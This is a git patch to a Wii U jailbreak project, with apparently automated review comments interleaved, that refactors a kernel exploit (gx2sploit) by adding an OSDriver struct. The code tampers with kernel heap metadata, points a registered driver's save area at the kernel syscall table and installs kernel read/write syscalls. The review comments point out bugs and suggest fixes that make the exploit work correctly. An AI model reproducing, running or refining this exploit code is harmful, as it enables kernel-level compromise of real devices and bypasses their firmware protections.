From 57ae89ec2d08300f702fd3161b774faddf0885ad Mon Sep 17 00:00:00 2001
From: NexoCube
Date: Sat, 18 Mar 2017 13:09:32 +0100
Subject: [PATCH] Updated Kernel Exploit (added OSDriver struct) thx to plutoo for his public notes

---
 Readme.MD | 2 +-
 kernel/gx2sploit/src/loader.c | 8 ++++----
 kernel/osdriver/src/loader.c | 2 +-
 libwiiu/src/coreinit.h | 8 ++++++++
 4 files changed, 14 insertions(+), 6 deletions(-)

diff --git a/Readme.MD b/Readme.MD
index 13692d4..7518383 100755
--- a/Readme.MD
+++ b/Readme.MD
@@ -7,7 +7,7 @@ Right now, almost all firmware versions are compatible:
 * Firmware version 5.3.2 is supported by exploiting a memory corruption bug (CVE-2014-1300).
 * Firmware versions 5.1.1 to 5.3.1 are also supported, but currently unimplemented.
 * Firmware version 5.4.0 is supported.
-* Firmware version 5.5.0/5.5.1 are supported, but only userland.
+* Firmware version 5.5.0/5.5.1 are supported.
 ### What's inside? ###
diff --git a/kernel/gx2sploit/src/loader.c b/kernel/gx2sploit/src/loader.c
index 056253e..4458962 100755
--- a/kernel/gx2sploit/src/loader.c
+++ b/kernel/gx2sploit/src/loader.c
@@ -43,7 +43,7 @@ void _start()
 	/* OSDriver functions */
 	uint32_t reg[] = {0x38003200, 0x44000002, 0x4E800020};
-	uint32_t (*Register)(char *driver_name, uint32_t name_length, void *buf1, void *buf2) = find_gadget(reg, 0xc, (uint32_t) __PPCExit);
+	OSDriver (*Register)(char *driver_name, uint32_t name_length, void *buf1, void *buf2) = find_gadget(reg, 0xc, (uint32_t) __PPCExit);
 	uint32_t dereg[] = {0x38003300, 0x44000002, 0x4E800020};
 	uint32_t (*Deregister)(char *driver_name, uint32_t name_length) = find_gadget(dereg, 0xc, (uint32_t) __PPCExit);
 	uint32_t copyfrom[] = {0x38004700, 0x44000002, 0x4E800020};
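Review bot: The added line `OSDriver (*Register)(...)` declares the `li r0,0x3200; sc; blr` stub as returning a 0x4c-byte struct by value; on 32-bit PowerPC an aggregate return is passed through a hidden buffer pointer in r3 (unless the toolchain is configured for a register-return convention), so driver_name shifts to r4, name_length to r5 and the kernel syscall receives the wrong arguments. Nothing in the call site `Register(drvname, 6, NULL, NULL)` (later hunk) consumes the return value, and the sibling `Deregister` keeps `uint32_t`, which suggests the syscall returns a status word. Keep `uint32_t (*Register)(char *driver_name, uint32_t name_length, void *buf1, void *buf2) = ...;`, or if the syscall really hands back a driver object, declare it as a pointer, `OSDriver *(*Register)(...)`, never as a by-value struct. `_start` begins before and ends after this hunk.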
@@ -58,7 +58,7 @@ void _start()
 	OSDynLoad_FindExport(gx2_handle, 0, "GX2Flush", &GX2Flush);
 	/* Allocate space for DRVHAX */
-	uint32_t *drvhax = OSAllocFromSystem(0x4c, 4);
+	OSDriver *drvhax = OSAllocFromSystem(sizeof(OSDriver), 4);
 	/* Set the kernel heap metadata entry */
 	uint32_t *metadata = (uint32_t*) (KERN_HEAP + METADATA_OFFSET + (0x02000000 * METADATA_SIZE));
@@ -128,7 +128,7 @@ void _start()
 	Register(drvname, 6, NULL, NULL);
 	/* Modify its save area to point to the kernel syscall table */
-	drvhax[0x44/4] = KERN_SYSCALL_TBL + (0x34 * 4);
+	drvhax->save_area = (uint32_t*)KERN_SYSCALL_TBL + (0x34 * 4);
 	/* Use DRVHAX to install the read and write syscalls */
 	uint32_t syscalls[2] = {KERN_CODE_READ, KERN_CODE_WRITE};
@@ -136,7 +136,7 @@ void _start()
 	/* Clean up the heap and driver list so we can exit */
 	kern_write((void*)(KERN_HEAP + STARTID_OFFSET), 0);
-	kern_write((void*)KERN_DRVPTR, drvhax[0x48/4]);
+	kern_write((void*)KERN_DRVPTR, (uint32_t)drvhax->next);
 	/* Modify the kernel address table and exit */
 	kern_write(KERN_ADDRESS_TBL + 0x12, 0x31000000);
diff --git a/kernel/osdriver/src/loader.c b/kernel/osdriver/src/loader.c
index 9a8d8fa..42f9ae1 100755
--- a/kernel/osdriver/src/loader.c
+++ b/kernel/osdriver/src/loader.c
@@ -356,7 +356,7 @@ void _main()
 		exitOSScreen(coreinit_handle);
 	}
 	/* Make DRVHAX point to DRVA to ensure a clean exit */
-	kern_write((void*)(drvhax_addr + 0x48), drva_addr);
+	kern_write((void*)(drvhax_addr + 0x48), drva_addr); //drv + 0x48 = next_driver_ptr
 	//map (mostly unused) memory area to specific MEM2 region
 #if (VER<410)
 	//start of region on old FWs
diff --git a/libwiiu/src/coreinit.h b/libwiiu/src/coreinit.h
index f381ac6..ac5eb8f 100755
--- a/libwiiu/src/coreinit.h
+++ b/libwiiu/src/coreinit.h
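Review bot: The result of `OSAllocFromSystem(sizeof(OSDriver), 4)` is still used without a NULL check, and the new typed pointer is dereferenced later (`drvhax->save_area`, `drvhax->next`), so an allocation failure becomes a write at a low address after the kernel heap metadata entry right below has already been tampered with. Bail out before the metadata write, e.g. `if (drvhax == NULL) return;` (or whatever exit path the rest of `_start` uses; the function begins before and ends after this hunk). The `sizeof(OSDriver)` replacement of `0x4c` is only correct while the struct in coreinit.h stays exactly 0x4c bytes, which is worth pinning with a static assertion next to the struct.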
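Review bot: The new `drvhax->save_area = (uint32_t*)KERN_SYSCALL_TBL + (0x34 * 4);` changes the address that is written: casting first turns `+ (0x34 * 4)` into pointer arithmetic on `uint32_t`, which adds 0x340 bytes, whereas the removed integer expression added 0xD0 bytes (assuming KERN_SYSCALL_TBL is an integer address constant, which the explicit cast and the `(void*)(KERN_HEAP + ...)` casts elsewhere suggest). The kernel read/write syscalls installed through this save area would then land 0x270 bytes past the intended table slot. Use the element index, `drvhax->save_area = (uint32_t*)KERN_SYSCALL_TBL + 0x34;`, which also reads as "syscall slot 0x34", or cast after adding: `(uint32_t*)(KERN_SYSCALL_TBL + (0x34 * 4))`. `_start` begins before and ends after this hunk.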
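Review bot: The osdriver hunk documents the magic `0x48` in a trailing comment instead of deriving it, while the gx2sploit path in the same commit now goes through `OSDriver::next`; the two exploits can drift if the struct is ever corrected. Write it as `kern_write((void*)(drvhax_addr + offsetof(OSDriver, next)), drva_addr);` (needs `<stddef.h>`, and assumes this file includes coreinit.h, which I cannot see from the hunk), so the offset has one definition. `_main` begins before and ends after this hunk.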
@@ -70,4 +70,12 @@ typedef struct OSContext
 	uint32_t srr1;
 } OSContext;
+typedef struct OSDriver
+{
+	char name[0x40];
+	uint32_t unk;
+	uint32_t *save_area; //0x44
+	struct OSDriver *next;
+} OSDriver;
+
 #endif /* COREINIT_H */
\ No newline at end of file
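Review bot: This struct mirrors a kernel-owned object that the exploit writes through (the gx2sploit hunks replace the literal `0x4c` size and the `0x44`/`0x48` indexes with `sizeof(OSDriver)` and field access), so its layout must not depend on what the compiler happens to do; pin it with `_Static_assert(sizeof(OSDriver) == 0x4c, "OSDriver size");` and `_Static_assert(offsetof(OSDriver, next) == 0x48, "OSDriver.next offset");` after the typedef (`<stddef.h>` for offsetof; if the toolchain is pre-C11, a negative-array-size typedef gives the same guarantee). Mirror the `//0x44` annotation with `//0x48` on `next` and give `unk` a comment such as `// 0x40: purpose unknown, not referenced by the exploit code` so a reader does not assume it is free. The file still ends without a trailing newline, which the hunk's `\ No newline at end of file` marker shows.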